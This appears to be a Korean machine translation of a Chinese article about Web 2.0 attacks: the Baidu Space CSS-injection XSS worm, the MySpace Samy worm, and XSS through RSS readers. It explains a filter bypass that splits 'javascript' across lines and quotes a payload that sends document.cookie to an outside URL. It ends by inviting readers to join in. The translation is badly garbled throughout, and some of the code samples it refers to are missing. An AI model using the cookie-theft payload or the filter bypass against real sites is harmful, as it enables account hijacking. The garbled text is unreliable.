이 를 통 해 Ajax 공격 은 엿 볼 수 있 지만 이것 은 시작 에 불과 하 다.7 월 에 바 이 두 는 바 이 두 공간 을 개 설 했 습 니 다.웹 2.0 기술 을 응용 한 다 는 것 은 밝 히 지 않 았 지만 웹 2.0 상징 의 테스트 판(베타)과 페이지 모델 구조 등 을 통 해 사실상 Ajax 기술 을 응용 한 것 을 알 수 있 습 니 다.그리고 공간 이 개 통 된 지 보름 도 안 되 어 해당 하 는 공격 방식 이 생 겼 습 니 다.이 공격 은 웜 이 라 고 할 수 있 습 니 다.바 이 두 가 제출 한 사용자 정의 css(Cascading)를 이용 합 니 다. Stylesheet,레이 어드 스타일 시트)에 삽 입 된 javascript 에 대한 필터 가 엄격 하지 않 아 공격 자가 악성 코드 를 쓸 수 있 도록 xs(Cross Site 스 크 립 팅)크로스 오 버.이 공간 을 탐색 하 는 바 이 두 통행증 사용 자 는 지각 하지 못 한 상태 에서 이 사 이 트 를 자신의 우정 연결 에 추가 합 니 다.가장 원시 적 인 코드 표본 은 다음 과 같다.그러나 이후 의 변종 으로 인해 상황 이 더욱 나 빠 졌 다.바 이 두 는 CSS 텍스트 의 예 를 들 어'javascript'과'expression'같은 문자열 만 걸 러 낸 것 을 발견 한 사람 이 있 기 때문이다.즉,'javascript'을 두 줄 로 나 누 어 쓰 면 바 이 두 의 필 터 를 돌 면서 동시에 IE 에 의 해 실 행 될 수 있다 는 것 이다.이때 변종 웜 도 이에 따라 생 겨 났 다.그 결 과 는 사용자 의 css 에 다음 과 같은 코드 를 추가 한 것 이다.\#header {…… 아주 간단 한 한 마디 죠.이것 은 거의 이 웜 을 바이러스 성질 로 향상 시 켰 습 니 다.왜냐하면 사용자 자체 가 css 수정 페이지 에 도착 하여 그의 css 코드 를 복구 할 수 없 기 때 문 입 니 다.사실 이 글 을 쓸 때 까지 바 이 두 공간 은 다른 종류의 악성 코드 삽입 방식 에 대해 효과 적 인 여과 와 봉쇄 를 하지 않 았 다.만약 에 그들 이 초래 한 영향 이 모두 국 역 이 라 고 생각한다 면 저 는 여러분 을 데 리 고 비교적 광범 위 한 영향 을 미 치 는 가장 웹 2.0 성격 을 가 진 Rss(Really)를 볼 수 밖 에 없습니다. Simple 신 디 케 이 션)공격.제 가 zdnet.com 의 Joris 입 니 다. Evers 의 제목 은'Blog'입 니 다. feeds may carry security risk ”알 수 있 듯 이 대체적으로 현재 거의 모든 온라인 이 든 오프라인 이 든 Rss 리더 가 Rss 에 섞 인 스 크 립 트 를 효과적으로 걸 러 내지 않 았 기 때문에 공격 자 는 Rss 에 악의 적 인 자바 script 코드 를 기록 할 수 있 고 결국은 xs 크로스 오 버 를 하여 사용자 정보 나 다른 것 을 얻 을 수 있다.유명한 블 로그 라인 을 포함 하여, RSS Reader, RSS Owl, Feed Demon, Sharp Reader 는 모두 공격 범위 안에 있다.작년 야후 입 니 다. rss xss 코드:javascript:%20document.location='http://www.target.com/cookie.cgi?'%20+document cookie; Should Steal Your Cookie. Tue, 20 Sep 2005 23:55:18 EDT javascript:%20alert(document.cookie); Should Steal Your Cookie. Tue, 20 Sep 2005 23:55:18 EDT 는 사실상 최초의 웹 2.0 공격 이 지난해 마 이 스페이스 에 나 타 났 다.마 이 스페이스 교우 사이트 에 자 바스 크 립 트 웜 코드 를 썼 다.아 약 스 방법 을 이용 해 수많은 사용자 들 이 모 르 는 사이 에 그 를 친구 명단 에 넣 었 고,이들 의 프로필 마지막 에'사 미'를 자동 으로 추가 했다. is my 'hero'라 는 글자.이 웜 은 세계 최초의 웹 2.0 웜 이 라 고 불 린 다.위의 이메일,css,rss 공격 에 대한 설명 에서 도 현재 의 웹 2.0 의 공격 이용 도 다각적 이다.그러나 크로스 오 버 만 가리 키 는 것 이 아니 라 인터넷 에'해 킹'이 있다. 아 약 스 의 글 중 한 마디 가 흑체 로 붙 었 다."By corrupting one of the dozens of data exchanges Ajax handles while loading a Web page, a hacker can take over control of the "PC",즉 적당 한 상황 에서 Ajax 공격 을 이용 하여 개인 용 컴퓨터 관리 권한 을 얻 는 것 도 가능 하 다.현재 시스템 이 패 치 발표 에 대해 실시 간 업데이트 기능 을 채택 하고 있 기 때문에 넘 침 을 통 해 셸 을 얻 는 것 은 0 day 의 시스템 구멍 을 제외 하고 매우 어렵다.한편,sql 주입 은 인터넷 에서 도 몇 년 동안 기 승 을 부 렸 고 효과 적 인 예방 방법 도 있 었 다.또한 Python 과 Ruby 언어의 발전 으로 인해 새로운 웹 2.0 서 비 스 는 기 존의 웹 구 조 를 대체 하 는 추 세 를 보이 고 있다.예 를 들 어 Plone 이다.그러나 바 꿀 수 없 는 것 은 웹 브 라 우 저 가 xhtml 와 자바 script 에 대한 설명 입 니 다.우리 가 자바 script 을 바 꿀 가능성 이 있다 면 우 리 는 영원히 자신의 권한 을 향상 시 킬 수 있 습 니 다.그러면 갈수 록 커지 는 웹 2.0 대군 에 대해 당신 은 그 중에서 숟가락 을 나 누 는 것 에 관심 이 있 습 니까?
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다: